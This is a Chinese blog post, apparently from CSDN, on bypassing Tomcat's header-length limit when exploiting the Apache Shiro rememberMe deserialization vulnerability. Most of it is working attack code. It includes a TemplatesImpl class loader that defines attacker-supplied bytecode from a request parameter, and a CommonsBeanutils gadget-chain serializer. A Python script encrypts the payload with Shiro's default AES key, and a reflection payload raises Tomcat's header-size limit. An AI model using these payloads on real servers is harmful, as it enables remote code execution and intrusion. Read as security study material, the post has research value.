shiro的payload长度限制绕过

最新推荐文章于 2024-05-30 12:58:04 发布
最新推荐文章于 2024-05-30 12:58:04 发布
阅读量2.2k 收藏 5
点赞数 2
分类专栏: # java漏洞 文章标签: java spring 安全 web安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thunderclap_/article/details/128932553
版权

一、背景

yishiro反序列化漏洞常规利用点在数据包的header头中,在这里直接插入目标代码,生成的payload是很长的,肯定会超过中间件 header 长度限制,如何解决这个问题呢?
主要绕过的方式有以下几种:
  • 1.从外部或从 HTTP 请求 body 中加载类字节码,header头中的payload仅仅实现读取和加载外部字节码的功能
  • 2.反射修改 AbstractHttp11Protocol 的 maxHttpHeaderSize
  • 3.class bytes使用gzip + base64压缩编码
测试环境:

方法一从外部或从 HTTP 请求 body 中加载类字节码

1.构造请求头中的类加载器

  • 新建项目修改pom,添加如下两个依赖,一个是tomcat的,一个是springframework的。 
<dependencies>
    <dependency>
        <groupId>org.apache.tomcat.embed</groupId>
        <artifactId>tomcat-embed-core</artifactId>
        <version>8.5.50</version>
    </dependency>
    <dependency>
        <groupId>org.springframework</groupId>
        <artifactId>spring-web</artifactId>
        <version>2.5</version>
    </dependency>
</dependencies>
  • 构造header头的类构造器 
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class MyClassLoader extends AbstractTranslet {
    static{
        try{
            //获取到当前请求的request对象
            javax.servlet.http.HttpServletRequest request = ((org.springframework.web.context.request.ServletRequestAttributes)org.springframework.web.context.request.RequestContextHolder.getRequestAttributes()).getRequest();
            //反射获取request对象的request参数
            java.lang.reflect.Field r=request.getClass().getDeclaredField("request");
            r.setAccessible(true);
            //获取当前request的response对象
            org.apache.catalina.connector.Response response =((org.apache.catalina.connector.Request) r.get(request)).getResponse();
            //获取当前request的session对象
            javax.servlet.http.HttpSession session = request.getSession();
            //获取当前request对象的请求参数classData
            String classData=request.getParameter("classData");
            //将获取到的classData里面的内容base64解码成byte[]对象
            byte[] classBytes = new sun.misc.BASE64Decoder().decodeBuffer(classData);
            //类加载器反射获取defineClass方法,这里调用的方法是defineClass(byte[] b, int off, int len)
            java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass",new Class[]{byte[].class, int.class, int.class});
            defineClassMethod.setAccessible(true);
            //defineClassMethod调用执行
            Class cc = (Class) defineClassMethod.invoke(MyClassLoader.class.getClassLoader(), classBytes, 0,classBytes.length);
            //将执行结果传入到request、response、session三个对象
            cc.newInstance().equals(new Object[]{request,response,session});
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public void transform(DOM arg0, SerializationHandler[] arg1) throws TransletException {
    }
    public void transform(DOM arg0, DTMAxisIterator arg1, SerializationHandler arg2) throws TransletException {
    }
}
  • 编译获取class文件

2.构造CB链进行序列化

代码如下: 
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Collections;
import java.util.PriorityQueue;


public class CommonsBeanutilsShiroPayload{
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
    public static void main(String[] args) throws Exception {
        //1.构造TemplatesImpl对象,其中code就是读取第一步构造好的类加载器。
        byte[] code = Files.readAllBytes(Paths.get("C:\\tools\\fuxian\\bianyi\\target\\classes\\MyClassLoader.class"));
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][] {code});
        setFieldValue(obj, "_name", "test");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        //2.实例化BeanComparator,其中comparator的部分就用我们找到的替换类
//            BeanComparator comparator = new BeanComparator(null,String.CASE_INSENSITIVE_ORDER);
        BeanComparator comparator = new BeanComparator(null, Collections.reverseOrder());

        //3.实例化优先队列PriorityQueue,如下因为我们上面comparator是String类型,所以在add的时候要用String类型的字符串。
        PriorityQueue queue = new PriorityQueue(2,comparator);
        queue.add(1);
        queue.add(1);

        //4.反射将property 的值设置成恶意的outputProperties ,将队列里的两个1替换成恶意的TemplateImpl 对象
        setFieldValue(comparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{obj, obj});

        //5.序列化到文件
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("test.bin"));
        oos.writeObject(queue);
        oos.close();
    }
}
  • 执行完之后获取到序列化好的test.bin文件

3.构造rememberMe字段内容

  • 通过以往的构造payload的exp.py代码如下, 将如上制作好的test.bin复制到这个exp.py同目录下 
import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES


def get_file_data(filename):
    with open(filename,'rb') as f:
        data = f.read()
    return data

def aes_enc(data):
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    ciphertext = base64.b64encode(iv + encryptor.encrypt(pad(data)))
    return ciphertext

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-BETA-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    # test.bin为编译好的序列化链的内容
    data = get_file_data("test.bin")
    print(aes_enc(data))
  • 复制b' '之间的内容到burpsuite的cookie中rememberMe字段中备用。

4.构造字节码代码执行文件

  • 此处为了验证可以执行外部字节码内容,我们构造一个弹计算器的payload如下:
    • 此处遇到一个坑,如果写static静态函数来代码执行的话,会一直报错,提示 java.lang.InstantiationException: CalcTest,网上查找原因是因为反射调用invoke的时候需要执行无参构造函数的,所以这里直接写了无参构造函数。 
#CalcTest
public class CalcTest {
    public CalcTest() throws Exception {
        Runtime.getRuntime().exec("calc");
    }
}
  • 将其编译 
javac CalcTest.java
  • 获取其base64编码内容 
cat CalcTest.class |base64|sed ':label;N;s/\n//;b label'
  • 将如上base64编码的内容复制到burpsuite中,作为calssData的值,在发送请求,即可执行字节码中的内容,弹出计算器。

方法二:反射修改 AbstractHttp11Protocol 的 maxHttpHeaderSize

代码如下:(还未实践) 
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

@SuppressWarnings("all")
public class TomcatHeaderSize extends AbstractTranslet {

    static {
        try {
            java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");
            java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");
            java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req");
            java.lang.reflect.Field headerSizeField = org.apache.coyote.http11.Http11InputBuffer.class.getDeclaredField("headerBufferSize");
            java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler",null);
            contextField.setAccessible(true);
            headerSizeField.setAccessible(true);
            serviceField.setAccessible(true);
            requestField.setAccessible(true);
            getHandlerMethod.setAccessible(true);
            org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =
                    (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());
            org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);
            org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors();
            for (int i = 0; i < connectors.length; i++) {
                if (4 == connectors[i].getScheme().length()) {
                    org.apache.coyote.ProtocolHandler protocolHandler = connectors[i].getProtocolHandler();
                    if (protocolHandler instanceof org.apache.coyote.http11.AbstractHttp11Protocol) {
                        Class[] classes = org.apache.coyote.AbstractProtocol.class.getDeclaredClasses();
                        for (int j = 0; j < classes.length; j++) {
                        // org.apache.coyote.AbstractProtocol$ConnectionHandler
                            if (52 == (classes[j].getName().length()) || 60 == (classes[j].getName().length())) {
                                java.lang.reflect.Field globalField = classes[j].getDeclaredField("global");
                                java.lang.reflect.Field processorsField = org.apache.coyote.RequestGroupInfo.class.getDeclaredField("processors");
                                globalField.setAccessible(true);
                                processorsField.setAccessible(true);
                                org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(protocolHandler, null));
                                java.util.List list = (java.util.List) processorsField.get(requestGroupInfo);
                                for (int k = 0; k < list.size(); k++) {
                                    org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) requestField.get(list.get(k));
                                  // 10000 为修改后的 headersize
                                    headerSizeField.set(tempRequest.getInputBuffer(),10000);
                                }
                            }
                        }
                         // 10000 为修改后的 headersize
                        ((org.apache.coyote.http11.AbstractHttp11Protocol) protocolHandler).setMaxHttpHeaderSize(10000);
                    }
                }
            }
        } catch (Exception e) {
        }
    }
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
}

Thunderclap_
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
shiro defaultkey无利用_深入利用Shiro反序列化漏洞
weixin_35734296的博客
01-06 2997
0x00:背景shiro反序列化RCE是在实战中一个比较高频且舒适的漏洞,shiro框架在java web登录认证中广泛应用,每一次目标较多的情况下几乎都可以遇见shiro,而因其payload本身就是加密的,无攻击特征,所以几乎不会被waf检测和拦截。0x01:shiro反序列化的原理先来看看shiro在1.2.4版本反序列化的原理这里是shiro拿到cookie后的关键代码,先dec...
springboot整合shiro登录失败次数限制功能的实现代码
08-27
主要介绍了springboot整合shiro-登录失败次数限制功能,实现此功能如果是防止坏人多次尝试,破解密码的情况,所以要限制用户登录尝试次数,需要的朋友可以参考下
shiro反序列化长度限制
混子
03-28 2313
今天又是一天打工人,日常挖洞,结果盆友给了一个shiro反序列化洞,默认密钥,可真是激动的心颤抖的手,大清早让人莫名兴奋,心里还在想这是昨天熬夜的奖励嘛,来的这么突然,于是赶紧掏出了shiro反序列化利用工具,就是一梭子,事实证明,打脸总是来的措不及防,最终也是拿到了shell,如果这这样可以躲避waf的话,那是不是可以在某种程度上用来做webshell,效果应该不错,我感觉,以上是个人的想法,不知道可以玩不,有大佬可以解答嘛
浅谈Shiro550受Tomcat Header长度限制影响突破
weixin_68320784的博客
04-14 1375
写个shiro相关的东西,还是秉着写出来才能学的更多的理念,当然个人还是不太喜欢贴上整串代码,只是分享思路心得,在很早以前我学习这个只是想弹出计算器,但是后面自己还是更喜欢折腾实战方面的一些构思(虽然没有过),在实战中我们更希望得到一个有回显的,而不是只是执行一个命令,关于回显最通用的就是去遍历线程对象中获取request,但是后面发现Tomcat居然有Header长度限制,接下来就是解决问题 0x01 一些传统思路 思路一:修改maxHeaderSize(不太喜欢) 首先是在网上参考学习到了Lit
Shiro安全(二):Shiro-550内存马注入
weixin_43263451的博客
08-04 1033
漏洞环境采用木头师傅给出的https://github.com/KpLi0rn/ShiroVulnEnv 将上面的poc存入到cc11并AES加密后,可以看到生成的payload非常长,这已经超过了Tomcat默认的max header的大小所以我们需要想一些办法绕过Header的长度限制,现在比较常用的有两种方法:这里我们结合cc11进行注入 思路是改变org.apache.coyote.http11.AbstractHttp11Protocol的maxHeaderSize的大小,这个值会影响新的Req
vulhub漏洞复现 Apache Shiro 1.2.4反序列化漏洞 Apache Shiro 认证绕过漏洞
记录笔记
04-13 1427
vulhub漏洞复现 Apache Shiro 1.2.4反序列化漏洞 Apache Shiro 认证绕过漏洞 shiro反序列化漏洞有何特征?如何防御shiro反序列化漏洞 Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie,在服务端接收cookie值后,Base64解码–>AES解密–>反序列化。攻击者只要找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化–>AES加密–>Base64编
shiro漏洞复现】CVE-2016-4437反序列化漏洞+CVE-2020-1957权限绕过漏洞
serendipity1130的博客
09-01 506
1.CVE-2016-4437 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 1.证明存在shiro漏洞:(win7虚拟机) 打开下载好的ShiroExploit.jar,进入图形化Shiro检测界面,输入靶机ip,点击下一步。 2.选择第一个使用ceye.io进行漏洞检测,点击下一步,开始执行检测。
深入利用Shiro反序列化漏洞
web13618542420的博客
04-12 508
0x00:背景 shiro反序列化RCE是在实战中一个比较高频且舒适的漏洞,shiro框架在java web登录认证中广泛应用,每一次目标较多的情况下几乎都可以遇见shiro,而因其payload本身就是加密的,无攻击特征,所以几乎不会被waf检测和拦截。 0x01:shiro反序列化的原理 先来看看shiro在1.2.4版本反序列化的原理 这里是shiro拿到cookie后的关键代码,先decrypt再反序列化 跟到decrypt方法 调用具体的cipherService,传入加密后的数据和cipherK
S17-shiro权限绕过1
08-03
环境搭建源码地址使用github下载器即可下载代码配置认证设置* 在这里进行 Shiro 的配置* 1. 首先需要提供一个 Realm 的实例* 2. 需要配置
Apache Shiro 身份验证绕过漏洞安全风险通告
03-24
Apache Shiro 身份验证绕过漏洞安全风险通告
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
shiro-登录失败次数限制.zip
09-06
shiro-登录尝试次数限制
进阶2 探索图形化编程:扩展图形组件与切片开发的魅力
最新发布
优树搭的博客
05-30 1166
当这些切片成功地通过图形程序串联起来后,在后续进行程序升级或维护时,大家会惊喜地发现,图形程序就如同清晰的路标一般,可以非常便捷地通过图形程序准确地定位到相关切片,并对这些切片进行在线查看、编辑和执行等操作。而且,这些切片的代码长度通常不会太长,相比传统开发的代码,阅读起来要容易得多,这无疑会给系统后续的工作带来极大的便利。
JAVAEE之多线程进阶(2)_ CAS概念、实现原理、ABA问题及解决方案
2301_80653026的博客
05-29 1344
CAS全称Compare and swap,字面意思:”比较并交换“,它是一条 CPU 并发原语,用于判断内存中某个值是否为预期值,如果是则更改为新的值,这个过程是原子的。全称 Compare and swap, 即 “比较并交换”. 相当于通过一个原子的操作, 同时完成 “读取内存, 比较是否相等, 修改内存” 这三个步骤. 本质上需要 CPU 指令的支撑。
【STM32学习】HAL库点灯学习
2301_78895982的博客
05-26 836
STM32基于HAL库流水灯实验_hel库安装教程中文版-CSDN博客t=N7T8。
operator <=> (spaceship operator)
janeqi1987的专栏
05-28 828
= 与!= 操作符为了检查是否相等,现在定义== 操作符就够了。当编译器找不到表达式的匹配声明a!=b 时,编译器会重写表达式并查找!(a==b)。若这不起作用,编译器也会尝试改变操作数的顺序,所以也会尝试!(b==a):a!=b,!(b==a)因此,对于TypeA 的a 和TypeB 的b,编译器将能够识别并编译a!= b若需要的话,可以这样做• 一个独立函数operator!• 一个独立函数operator==(TypeA, TypeB)
Spring6基础笔记
质胜文则野,文胜质则史。文质彬彬,然后君子。
05-21 1174
Spring 是一款主流的 Java EE 轻量级开源框架 ,Spring 由“Spring 之父”Rod Johnson 提出并创立,其目的是用于简化 Java 企业级应用的开发难度和开发周期。Spring的用途不仅限于服务器端的开发。从简单性、可测试性和松耦合的角度而言,任何Java应用都可以从Spring中受益。Spring 框架除了自己提供功能外,还提供整合其他技术和框架的能力。Spring 自诞生以来备受青睐,一直被广大开发人员作为 Java 企业级应用程序开发的首选。时至今日,Spring 俨然
ssm139选课排课系统的设计与开发+vue
hjjshua的博客
05-25 1145
互联网的普及,改变了人们正常的生活学习及消费习惯,而且也大大的节省了人们的时间,由于各种管理系统都再不断的增加,更方便了用户,也改良了很多的用户习惯。对于选课排课系统查询方面缺乏系统的管理方式,为提高选课排课系统效率,特开发了本选课排课系统。 选课排课系统的设计主要是对系统所要实现的功能进行详细考虑,确定所要实现的功能后进行界面的设计,在这中间还要考虑如何可以更好的将功能及页面进行很好的结合,方便用户可以很轻松明了的找到自己所需要的信息,还有系统平台后期的可操作性,通过对信息内容的详细了解进行技术的开发。
spring boot 解决Apache Shiro身份认证绕过漏洞(CVE-2023-22602)
06-02
对于Spring Boot项目中的Apache Shiro身份认证绕过漏洞(CVE-2023-22602),可以通过以下步骤进行解决: 1.升级Apache Shiro到1.7.1或更高版本。可以在项目的Maven或Gradle依赖中更新Apache Shiro的版本。 2.检查应用程序的Shiro配置文件,确保已正确配置了身份认证。例如,应该使用密码哈希来存储用户的密码,并使用适当的加密算法来保护密码。 3.禁用Shiro的RememberMe功能,以防止身份验证绕过攻击。可以在Shiro配置文件中添加以下配置: ``` securityManager.rememberMeManager.cookie.enabled = false ``` 这将禁用RememberMe cookie。 4.限制登录尝试次数,以防止暴力攻击。可以使用Spring Security等其他安全框架来实现此功能。 这些措施可以有效地防止Apache Shiro身份认证绕过漏洞(CVE-2023-22602)。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值